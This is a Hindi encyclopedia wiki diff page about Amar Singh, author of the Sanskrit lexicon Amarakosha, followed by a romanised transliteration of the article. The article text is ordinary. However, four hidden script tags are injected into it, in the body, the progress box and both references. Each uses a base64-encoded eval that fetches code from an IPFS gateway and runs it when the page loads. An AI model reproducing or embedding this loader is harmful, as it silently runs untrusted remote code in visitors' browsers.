Difference between revisions of "अमर सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:भारतीय चरित कोश (को हटा दिया गया हैं।))
 
(2 intermediate revisions by one other user not shown)
Line 1: Line 1:
 
{{बहुविकल्प|बहुविकल्पी शब्द=अमर सिंह|लेख का नाम=अमर सिंह (बहुविकल्पी)}}
 
{{बहुविकल्प|बहुविकल्पी शब्द=अमर सिंह|लेख का नाम=अमर सिंह (बहुविकल्पी)}}
  
'''अमर सिंह''' [[विक्रमादित्य|राजा विक्रमादित्य]] की राजसभा के नौ रत्नों में से एक थे। उनका बनाया '[[अमरकोष]]' [[संस्कृत|संस्कृत भाषा]] का सबसे प्रसिद्ध कोष ग्रन्थ है। उन्होंने इसकी रचना तीसरी शताब्दी ई. पू. में की थी।
+
'''अमर सिंह''' [[विक्रमादित्य|राजा विक्रमादित्य]] की राजसभा के नौ रत्नों में से एक थे। अमरसिंह नाम से अनुमान होता है कि उसके पूर्वज क्षत्रिय रहे होंगे। उनका बनाया '[[अमरकोष]]' [[संस्कृत|संस्कृत भाषा]] का सबसे प्रसिद्ध कोष ग्रन्थ है। उन्होंने इसकी रचना तीसरी शताब्दी ई. पू. में की थी। इस तथ्य का प्रमाण अमरकोश के भीतर ही मिलता है कि अमरसिंह बौद्ध थे। अमरकोश के मंगलाचरण में प्रच्छन्न रूप से [[बुद्ध]] की स्तुति की गई है, किसी हिंदू [[देवी]] [[देवता]] की नहीं। यह पुरानी किंवदंती है कि [[शंकराचार्य]] के समय (आठवीं शताब्दी) में अमरसिंह के ग्रंथ जहाँ-जहाँ मिले, जला दिए गए।
 +
===परिचय===
 +
'''अमरसिंह''' का निश्चित समय बताना असंभव ही है क्योंकि अमरसिंह ने अपने से पहले के कोशकारों के नाम ही नहीं दिए हैं। लिखा है:- <blockquote>'सम्ह्रात्यान्यतंत्राणि'</blockquote> अर्थात्‌ मैंने अन्य कोशों से सामग्री ली है, किंतु किससे ली है, इसका उल्लेख नहीं किया। कर्न और पिशल का अनुमान था कि अमरसिंह का समय 550 ई.के आसपास होगा क्योंकि वह [[विक्रमादित्य]] के नवरत्नों में गिना जाता है जिनमें से एक रत्न [[वराहमिहिर]] का निश्चित समय 550 ई. है। ब्यूलर अमरसिंह को [[लक्ष्मणसेन]] की सभा का रत्न मानते हैं। विलमट साहब को गया में एक [[शिलालेख]] मिला जो 948 ई. का है। इसमें खुदा है कि [[विक्रमादित्य]] की सभा के नवरत्नों में से एक रत्न 'अमरदेव' 'अमरसिंह' ही था, इसका प्रमाण नहीं मिलता; महत्व की बात है कि प्राय: अस्सी पचासी वर्ष से उक्त शिलालेख और उसके अनुवाद लुप्त हैं। हलायुध ने भी अपने कोश में एक प्राचीन कोशकार अमरदत्त का नाम गिनाया है। यूरोप के विद्वान्‌ इस अमरदत्त को अमरसिंह नहीं मानते।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=190 |url=}}</ref> 
  
 
*संस्कृत भाषा के प्रायः 10,000 शब्दों के संग्रह ग्रंथ ‘अमरकोष’ के रचयिता अमर सिंह के जीवन के संबंध में नाम मात्र की जानकारी उपलब्ध है और वह भी परिस्थितिजन्य प्रमाणों के आधार पर।
 
*संस्कृत भाषा के प्रायः 10,000 शब्दों के संग्रह ग्रंथ ‘अमरकोष’ के रचयिता अमर सिंह के जीवन के संबंध में नाम मात्र की जानकारी उपलब्ध है और वह भी परिस्थितिजन्य प्रमाणों के आधार पर।
*अमरकोष के आरंभ में अप्रत्यक्ष रूप से केवल [[बुद्ध]] की स्तुति की गई है। इसी प्रकार [[ब्रह्मा]], [[विष्णु]] आदि से पहले बुद्ध का नाम दिया गया है। इससे यह निष्कर्ष निकाला जाता है कि अमर सिंह [[बौद्ध]] धर्मानुयायी थे। उनकी गणना [[वराहमिहिर]] के साथ [[विक्रमादित्य]] के नवरत्नों में की जाती है। वराहमिहिर 550 ईस्वी में थे। अतः यही समय अमर सिंह का भी माना जाता है।
+
*[[अमरकोष]] के आरंभ में अप्रत्यक्ष रूप से केवल [[बुद्ध]] की स्तुति की गई है। इसी प्रकार [[ब्रह्मा]], [[विष्णु]] आदि से पहले बुद्ध का नाम दिया गया है। इससे यह निष्कर्ष निकाला जाता है कि अमर सिंह [[बौद्ध]] धर्मानुयायी थे। उनकी गणना [[वराहमिहिर]] के साथ [[विक्रमादित्य]] के नवरत्नों में की जाती है। वराहमिहिर 550 ईस्वी में थे। अतः यही समय अमर सिंह का भी माना जाता है।
*अमर सिंह ने अपने कोश का नाम ‘ नामलिंगानुशासन’ रखा था। कदाचित रचयिता के नाम पर बाद में यह ‘[[अमरकोष]]’ के नाम से प्रसिद्ध हुआ। यह एक पद्यबद्ध रचना है। कंठस्थ करने में सुविधा के कारण उन दिनों की रचनाएं श्लोकों में ही अधिक मिलती हैं।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=40|url=}}</ref>
+
*अमर सिंह ने अपने कोश का नाम '''नामलिंगानुशासन''' रखा था। कदाचित रचयिता के नाम पर बाद में यह ‘[[अमरकोष]]’ के नाम से प्रसिद्ध हुआ। यह एक पद्यबद्ध रचना है। कंठस्थ करने में सुविधा के कारण उन दिनों की रचनाएं श्लोकों में ही अधिक मिलती हैं।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=40|url=}}</ref>
 
*एक [[शिलालेख]] के अनुसार अमर सिंह ने [[बोधगया]] में एक बुद्ध मंदिर का निर्माण कराया था।
 
*एक [[शिलालेख]] के अनुसार अमर सिंह ने [[बोधगया]] में एक बुद्ध मंदिर का निर्माण कराया था।
  
Line 14: Line 16:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{संस्कृत साहित्यकार}}
 
{{संस्कृत साहित्यकार}}
[[Category:साहित्यकार]][[Category:संस्कृत साहित्यकार]][[Category:जीवनी साहित्य]][[Category:चरित कोश]][[Category:इतिहास कोश]]
+
[[Category:साहित्यकार]][[Category:संस्कृत साहित्यकार]][[Category:जीवनी साहित्य]][[Category:चरित कोश]][[Category:इतिहास कोश]][[Category:हिन्दी विश्वकोश]]
 +
[[Category:भारतीय चरित कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 12:35, 6 January 2020

chitr:Disamb2.jpg amar sianh ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- amar sianh (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

amar sianh raja vikramadity ki rajasabha ke nau ratnoan mean se ek the. amarasianh nam se anuman hota hai ki usake poorvaj kshatriy rahe hoange. unaka banaya 'amarakosh' sanskrit bhasha ka sabase prasiddh kosh granth hai. unhoanne isaki rachana tisari shatabdi ee. poo. mean ki thi. is tathy ka praman amarakosh ke bhitar hi milata hai ki amarasianh bauddh the. amarakosh ke mangalacharan mean prachchhann roop se buddh ki stuti ki gee hai, kisi hiandoo devi devata ki nahian. yah purani kianvadanti hai ki shankarachary ke samay (athavian shatabdi) mean amarasianh ke granth jahaan-jahaan mile, jala die ge.

parichay

amarasianh ka nishchit samay batana asanbhav hi hai kyoanki amarasianh ne apane se pahale ke koshakaroan ke nam hi nahian die haian. likha hai:-

'samhratyanyatantrani'

arthath‌ maianne any koshoan se samagri li hai, kiantu kisase li hai, isaka ullekh nahian kiya. karn aur pishal ka anuman tha ki amarasianh ka samay 550 ee.ke asapas hoga kyoanki vah vikramadity ke navaratnoan mean gina jata hai jinamean se ek ratn varahamihir ka nishchit samay 550 ee. hai. byoolar amarasianh ko lakshmanasen ki sabha ka ratn manate haian. vilamat sahab ko gaya mean ek shilalekh mila jo 948 ee. ka hai. isamean khuda hai ki vikramadity ki sabha ke navaratnoan mean se ek ratn 'amaradev' 'amarasianh' hi tha, isaka praman nahian milata; mahatv ki bat hai ki pray: assi pachasi varsh se ukt shilalekh aur usake anuvad lupt haian. halayudh ne bhi apane kosh mean ek prachin koshakar amaradatt ka nam ginaya hai. yoorop ke vidvanh‌ is amaradatt ko amarasianh nahian manate.[1]

  • sanskrit bhasha ke prayah 10,000 shabdoan ke sangrah granth ‘amarakosh’ ke rachayita amar sianh ke jivan ke sanbandh mean nam matr ki janakari upalabdh hai aur vah bhi paristhitijany pramanoan ke adhar par.
  • amarakosh ke aranbh mean apratyaksh roop se keval buddh ki stuti ki gee hai. isi prakar brahma, vishnu adi se pahale buddh ka nam diya gaya hai. isase yah nishkarsh nikala jata hai ki amar sianh bauddh dharmanuyayi the. unaki ganana varahamihir ke sath vikramadity ke navaratnoan mean ki jati hai. varahamihir 550 eesvi mean the. atah yahi samay amar sianh ka bhi mana jata hai.
  • amar sianh ne apane kosh ka nam namalianganushasan rakha tha. kadachit rachayita ke nam par bad mean yah ‘amarakosh’ ke nam se prasiddh hua. yah ek padyabaddh rachana hai. kanthasth karane mean suvidha ke karan un dinoan ki rachanaean shlokoan mean hi adhik milati haian.[2]
  • ek shilalekh ke anusar amar sianh ne bodhagaya mean ek buddh mandir ka nirman karaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 1 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 190 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. bharatiy charit kosh |lekhak: liladhar sharma 'parvatiy' |prakashak: shiksha bharati, madarasa rod, kashmiri get, dilli |prishth sankhya: 40 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh